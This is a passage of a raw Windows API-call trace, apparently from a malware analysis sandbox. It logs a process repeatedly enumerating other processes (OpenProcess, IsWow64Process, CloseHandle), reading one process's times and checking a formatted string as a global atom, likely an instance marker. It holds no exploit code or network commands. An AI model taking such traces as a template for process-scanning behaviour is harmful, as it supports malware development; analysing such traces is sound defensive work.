	[0118.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.083] CloseHandle (hObject=0x698) returned 1
	[0118.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.083] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.083] CloseHandle (hObject=0x698) returned 1
	[0118.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.084] CloseHandle (hObject=0x698) returned 1
	[0118.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.084] CloseHandle (hObject=0x698) returned 1
	[0118.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.084] CloseHandle (hObject=0x698) returned 1
	[0118.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.084] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.084] CloseHandle (hObject=0x698) returned 1
	[0118.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.085] CloseHandle (hObject=0x698) returned 1
	[0118.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.085] CloseHandle (hObject=0x698) returned 1
	[0118.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.085] CloseHandle (hObject=0x698) returned 1
	[0118.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.085] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.085] CloseHandle (hObject=0x698) returned 1
	[0118.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.086] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.086] CloseHandle (hObject=0x698) returned 1
	[0118.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.086] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.086] CloseHandle (hObject=0x698) returned 1
	[0118.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.086] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.086] CloseHandle (hObject=0x698) returned 1
	[0118.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.086] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.086] CloseHandle (hObject=0x698) returned 1
	[0118.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.087] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.087] CloseHandle (hObject=0x698) returned 1
	[0118.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.087] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.087] CloseHandle (hObject=0x698) returned 1
	[0118.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.087] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.087] CloseHandle (hObject=0x698) returned 1
	[0118.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.087] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.087] CloseHandle (hObject=0x698) returned 1
	[0118.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.087] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.087] CloseHandle (hObject=0x698) returned 1
	[0118.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.088] CloseHandle (hObject=0x698) returned 1
	[0118.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.088] CloseHandle (hObject=0x698) returned 1
	[0118.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.088] CloseHandle (hObject=0x698) returned 1
	[0118.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.088] CloseHandle (hObject=0x698) returned 1
	[0118.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.088] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.089] CloseHandle (hObject=0x698) returned 1
	[0118.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.089] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.089] CloseHandle (hObject=0x698) returned 1
	[0118.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.089] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.089] CloseHandle (hObject=0x698) returned 1
	[0118.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.089] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.089] CloseHandle (hObject=0x698) returned 1
	[0118.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.090] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.090] CloseHandle (hObject=0x698) returned 1
	[0118.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.090] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.090] CloseHandle (hObject=0x698) returned 1
	[0118.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.090] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.091] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.091] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.091] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.093] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.093] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.093] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.112] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.112] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.112] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.113] CloseHandle (hObject=0x698) returned 1
	[0118.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.113] CloseHandle (hObject=0x698) returned 1
	[0118.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.113] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.113] CloseHandle (hObject=0x698) returned 1
	[0118.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.114] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.114] CloseHandle (hObject=0x698) returned 1
	[0118.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.150] CloseHandle (hObject=0x698) returned 1
	[0118.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.151] CloseHandle (hObject=0x698) returned 1
	[0118.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.151] CloseHandle (hObject=0x698) returned 1
	[0118.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.152] CloseHandle (hObject=0x698) returned 1
	[0118.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.152] CloseHandle (hObject=0x698) returned 1
	[0118.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.152] CloseHandle (hObject=0x698) returned 1
	[0118.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.152] CloseHandle (hObject=0x698) returned 1
	[0118.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.152] CloseHandle (hObject=0x698) returned 1
	[0118.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.153] CloseHandle (hObject=0x698) returned 1
	[0118.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.154] CloseHandle (hObject=0x698) returned 1
	[0118.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.154] CloseHandle (hObject=0x698) returned 1
	[0118.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.154] CloseHandle (hObject=0x698) returned 1
	[0118.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.154] CloseHandle (hObject=0x698) returned 1
	[0118.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.154] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.154] CloseHandle (hObject=0x698) returned 1
	[0118.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.155] CloseHandle (hObject=0x698) returned 1
	[0118.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.155] CloseHandle (hObject=0x698) returned 1
	[0118.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.155] CloseHandle (hObject=0x698) returned 1
	[0118.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.155] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.155] CloseHandle (hObject=0x698) returned 1
	[0118.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.156] CloseHandle (hObject=0x698) returned 1
	[0118.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.156] CloseHandle (hObject=0x698) returned 1
	[0118.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.156] CloseHandle (hObject=0x698) returned 1
	[0118.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.156] CloseHandle (hObject=0x698) returned 1
	[0118.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.156] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.156] CloseHandle (hObject=0x698) returned 1
	[0118.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.157] CloseHandle (hObject=0x698) returned 1
	[0118.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.157] CloseHandle (hObject=0x698) returned 1
	[0118.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.157] CloseHandle (hObject=0x698) returned 1
	[0118.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.157] CloseHandle (hObject=0x698) returned 1
	[0118.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.158] CloseHandle (hObject=0x698) returned 1
	[0118.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.158] CloseHandle (hObject=0x698) returned 1
	[0118.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.158] CloseHandle (hObject=0x698) returned 1
	[0118.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.158] CloseHandle (hObject=0x698) returned 1
	[0118.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.159] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.159] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.160] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.160] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.160] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.160] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.160] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.161] CloseHandle (hObject=0x698) returned 1
	[0118.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.161] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.161] CloseHandle (hObject=0x698) returned 1
	[0118.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.161] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.161] CloseHandle (hObject=0x698) returned 1
	[0118.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.161] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.162] CloseHandle (hObject=0x698) returned 1
	[0118.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.197] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.197] CloseHandle (hObject=0x698) returned 1
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.197] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.197] CloseHandle (hObject=0x698) returned 1
	[0118.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.198] CloseHandle (hObject=0x698) returned 1
	[0118.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.198] CloseHandle (hObject=0x698) returned 1
	[0118.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.198] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.198] CloseHandle (hObject=0x698) returned 1
	[0118.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.199] CloseHandle (hObject=0x698) returned 1
	[0118.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.199] CloseHandle (hObject=0x698) returned 1
	[0118.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.199] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.199] CloseHandle (hObject=0x698) returned 1
	[0118.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.200] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.200] CloseHandle (hObject=0x698) returned 1
	[0118.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
